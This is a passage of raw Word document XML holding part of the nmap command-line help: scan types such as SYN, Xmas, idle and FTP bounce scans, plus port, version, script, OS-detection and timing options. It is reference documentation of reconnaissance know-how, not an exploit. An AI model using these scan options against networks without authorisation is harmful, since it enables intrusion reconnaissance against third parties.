          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --traceroute: Trace hop path to each host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674EA96" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCAN TECHNIQUES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58556F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD24E1A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sU: UDP Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B1FED" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sN/sF/sX: TCP Null, FIN, and Xmas scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD490E8" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --scanflags &lt;flags&gt;: Customize TCP scan flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7C488" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sI &lt;zombie host[:probeport]&gt;: Idle scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB94B5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sY/sZ: SCTP INIT/COOKIE-ECHO scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14D4F9" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sO: IP protocol scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133B198B" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -b &lt;FTP relay host&gt;: FTP bounce scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FAF1A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PORT SPECIFICATION AND SCAN ORDER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD6ED5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -p &lt;port ranges&gt;: Only scan specified ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991BAEC" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BCA589" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --exclude-ports &lt;port ranges&gt;: Exclude the specified ports from scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E273C49" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F: Fast mode - Scan fewer ports than the default scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124062E3" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -r: Scan ports consecutively - don't randomize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E51F1" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --top-ports &lt;number&gt;: Scan &lt;number&gt; most common ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A5C38" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --port-ratio &lt;ratio&gt;: Scan ports more common than &lt;ratio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0D01A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SERVICE/VERSION DETECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C1D4E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sV: Pr obe open ports to determine service/version info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD2B73" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --version-intensity &lt;level&gt;: Set from 0 (light) to 9 (try all probes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68CD1F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --version-light: Limit to most likely probes (intensity 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291D8EE" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --version-all: Try every single probe (intensity 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C04EA" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --version-trace: Show detailed version scan activity (for debugging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499578C6" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCRIPT SCAN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06470FD6" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sC: equivalent to --script=default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F37384A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --script=&lt;Lua scripts&gt;: &lt;Lua scripts&gt; is a comma separated list of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34776DE3" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">           directories, script-files or script-categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF72CE" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --script-args=&lt;n1=v1,[n2=v2,...]&gt;: provide arguments to scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA444C5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --script-args-file=filename: provide NSE script args in a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEEFDAC" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --script-trace: Show all data sent and received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A86B3F6" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --script-updatedb: Update the script database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB29D3D" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --script-help=&lt;Lua scripts&gt;: Show help about scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4701D5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">           &lt;Lua scripts&gt; is a comma-separated list of script-files or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E0598" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">           script-categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9816B" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OS DETECTION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76C09D" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -O: Enable OS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7F93D" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --osscan-limit: Limit OS detection to promising targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B16776" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --osscan-guess: Guess OS more aggressively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DAEC97" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TIMING AND PERFORMANCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B324B7" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Options which take &lt;time&gt; are in seconds, or append 'ms' (milliseconds),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71943B5F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6A2DF" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -T&lt;0-5&gt;: Set timing template (higher is faster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F932C7D" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
